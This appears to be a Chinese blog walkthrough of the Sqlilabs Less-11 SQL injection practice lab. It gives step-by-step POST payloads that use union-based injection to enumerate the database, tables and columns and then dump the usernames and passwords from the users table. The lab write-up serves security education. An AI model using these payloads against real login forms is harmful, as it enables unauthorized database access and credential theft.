Sqlilabs Less-11

桑二小姐

 关注

阅读 42

2022-03-11

这关开始就变成登录画面了
先来尝试一个弱口令,用户admin密码admin,登录成功:
在这里插入图片描述用burpsuite抓包进行接下来的操作

判断出是单引号字符型注入:

uname=admin'#&passwd=&submit=Submit

在这里插入图片描述判断列数:

uname=admin'+order+by+2#&passwd=&submit=Submit

在这里插入图片描述爆库:

uname=-admin'+union+select+database(),version()#&passwd=&submit=Submit

在这里插入图片描述爆表:

uname=-admin'+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()#&passwd=&submit=Submit

在这里插入图片描述爆列:

uname=-admin'+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name='users'#&passwd=&submit=Submit

在这里插入图片描述爆数据:

uname=-admin'+union+select+1,group_concat(username,password)+from+users#&passwd=&submit=Submit

在这里插入图片描述

相关推荐

Sqlilabs Less-21

斗米 45 0 0

sqlilabs—less7

夜空一星 21 0 0

sqlilabs—less-7—SQL注入写webshell

陈情雅雅 108 0 0

sql注入——sqlilabs1-15

晴儿成长记 27 0 0

什么是LeSS框架?Scrum / LeSS / LeSS Huge

倚然君 166 0 0

认识Less、Less的语法

何晓杰Dev 169 0 0

Less

写心之所想 63 0 0

less

回望这一段人生 29 0 0

Less是什么,Less怎么用?

诗远 194 0 0

使用 less

覃榜言 40 0 0

精彩评论(0)

0 0 举报